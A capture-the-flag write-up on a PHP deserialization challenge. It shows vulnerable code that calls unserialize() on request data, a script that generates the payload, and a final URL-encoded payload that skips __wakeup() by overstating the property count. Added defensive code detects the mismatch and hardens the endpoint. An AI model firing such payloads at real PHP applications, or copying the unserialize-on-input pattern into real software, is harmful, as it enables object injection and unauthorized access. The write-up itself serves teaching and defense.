[Geek Challenge 2019] PHP

Scanning the site's directories turns up a backup archive, www.zip.

In index.php there is an unserialize() call on user-controlled input:

<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>

Build a serialized string with username = admin and password = 100. Because the properties are private, their serialized names contain null bytes (invisible characters that would be lost in the URL), so URL-encode the string.

class.php (from www.zip):

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'admin';
    private $password = 100;

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    // runs on unserialize() and resets the name; this is what must be bypassed
    function __wakeup(){
        $this->username = 'guest';
    }

    // runs when the object is released; on the affected PHP versions this
    // still happens after a failed unserialize()
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

Generator script (run it next to class.php; the constructor requires both arguments):

<?php
include 'class.php';
$a = new Name('admin', 100);
echo urlencode(serialize($a));
?>

Declaring more properties in the serialized string than are actually present makes unserialize() abort before it calls __wakeup(), while __destruct() still runs on the half-built object, so username stays 'admin'.
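From the defender's side, the property-count mismatch is easy to spot before the data ever reaches unserialize(). The following is an added example, not code from the writeup or the challenge: a minimal walker over the PHP serialization format that reports every object whose header count differs from the members actually present (the __wakeup-skipping trick, PHP bug #72663, fixed in 5.6.25 / 7.0.10). The function names are this example's own; the first test input is the writeup's payload, the second is a constructed benign array.

```php
<?php
// Added example, not from the original writeup: a structural pre-check for
// serialized input that reports objects whose declared property count differs
// from the members actually present. Function names are this example's own.

function parseValue(string $s, int &$pos, array &$findings): void {
    $type = $s[$pos] ?? '';
    switch ($type) {
        case 'N':                                   // N;
            $pos += 2;
            return;
        case 'b':
        case 'i':
        case 'd':                                   // i:100;
            $end = strpos($s, ';', $pos);
            if ($end === false) {
                throw new RuntimeException("truncated scalar at $pos");
            }
            $pos = $end + 1;
            return;
        case 's':                                   // s:5:"admin";
            $colon = strpos($s, ':', $pos + 2);
            $len = (int) substr($s, $pos + 2, $colon - $pos - 2);
            $pos = $colon + 2 + $len + 2;           // skip :"<len bytes>";
            return;
        case 'a':                                   // a:<n>:{key;value;...}
            $colon = strpos($s, ':', $pos + 2);
            $n = (int) substr($s, $pos + 2, $colon - $pos - 2);
            $pos = $colon + 2;                      // skip :{
            for ($i = 0; $i < $n; $i++) {
                parseValue($s, $pos, $findings);    // key
                parseValue($s, $pos, $findings);    // value
            }
            $pos++;                                 // }
            return;
        case 'O':                                   // O:4:"Name":<n>:{...}
            $colon = strpos($s, ':', $pos + 2);
            $nameLen = (int) substr($s, $pos + 2, $colon - $pos - 2);
            $class = substr($s, $colon + 2, $nameLen);
            $p = $colon + 2 + $nameLen + 2;         // after the closing ":
            $colon2 = strpos($s, ':', $p);
            $declared = (int) substr($s, $p, $colon2 - $p);
            $pos = $colon2 + 2;                     // skip :{
            $actual = 0;
            // Count members up to the closing brace instead of trusting the
            // header. Private/protected names carry embedded null bytes; the
            // s: length prefix covers them like any other byte.
            while (($s[$pos] ?? '}') !== '}') {
                parseValue($s, $pos, $findings);    // property name
                parseValue($s, $pos, $findings);    // property value
                $actual++;
            }
            $pos++;                                 // }
            if ($declared !== $actual) {
                $findings[] = sprintf('%s: header declares %d properties, %d present',
                                      $class, $declared, $actual);
            }
            return;
        default:
            // references (r/R), C: custom objects and anything else: reject outright
            throw new RuntimeException("unsupported token '$type' at $pos");
    }
}

function countMismatches(string $serialized): array {
    $findings = [];
    $pos = 0;
    parseValue($serialized, $pos, $findings);
    return $findings;
}

// The writeup's payload, URL-decoded (%00 becomes the null byte in the names).
$payload = urldecode('O%3A4%3A%22Name%22%3A4%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D');
print_r(countMismatches($payload));                  // the Name object above
print_r(countMismatches(serialize(['a' => 1])));     // a constructed benign array
```

A non-empty result (or a thrown RuntimeException) is a reason to drop the request and log it; the check is cheap enough to run in a request filter in front of any endpoint that still calls unserialize().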

Final payload:

?select=O%3A4%3A%22Name%22%3A4%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D
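The root cause is unserialize() on request data. The following is an added example, not part of the writeup or the challenge, of how the index.php above would be hardened: the allowed_classes option (PHP 7.0 and later) stops the deserializer from instantiating Name at all, so neither __wakeup() nor __destruct() of the application class ever runs, and the JSON variant removes PHP serialization from the endpoint entirely. Function names are this example's own; the inputs are the writeup's payload plus constructed benign values.

```php
<?php
// Added example, not from the original writeup: a hardened replacement for
// the vulnerable index.php. Requires PHP >= 7.0 (allowed_classes) and, for
// decodeSelect(), PHP >= 7.3 (JSON_THROW_ON_ERROR). Names are this example's own.

function safeUnserialize(string $input): ?array {
    // allowed_classes => false: any O:...{} token becomes a
    // __PHP_Incomplete_Class stub instead of a live Name object, so no
    // application __wakeup()/__destruct() can be triggered by the input.
    $value = @unserialize($input, ['allowed_classes' => false]);

    // This endpoint only ever needed an array of scalars; a parse failure
    // (false) or anything that is not an array is rejected.
    if (!is_array($value)) {
        return null;
    }
    // Reject incomplete-class stubs nested anywhere inside the array too.
    $clean = true;
    array_walk_recursive($value, function ($v) use (&$clean) {
        if (is_object($v)) {
            $clean = false;
        }
    });
    return $clean ? $value : null;
}

// Better still: drop PHP serialization and accept JSON, which cannot describe
// objects with magic methods at all. The depth limit of 8 is a constructed choice.
function decodeSelect(string $input): array {
    $data = json_decode($input, true, 8, JSON_THROW_ON_ERROR);
    return is_array($data) ? $data : [];
}

// The writeup's payload, URL-decoded; with the class-count trick and no
// allowed classes it is rejected before any object exists.
$payload = urldecode('O%3A4%3A%22Name%22%3A4%3A%7Bs%3A14%3A%22%00Name%00username%22%3Bs%3A5%3A%22admin%22%3Bs%3A14%3A%22%00Name%00password%22%3Bi%3A100%3B%7D');
var_dump(safeUnserialize($payload));                        // rejected
var_dump(safeUnserialize(serialize(['select' => 'admin']))); // constructed benign input
var_dump(decodeSelect('{"select":"admin"}'));               // constructed JSON input
```

The allowed_classes option is a containment measure for code that cannot be changed quickly; the durable fix is the JSON path, because the serialized-object format is what gives the attacker a way to pick which class's magic methods run.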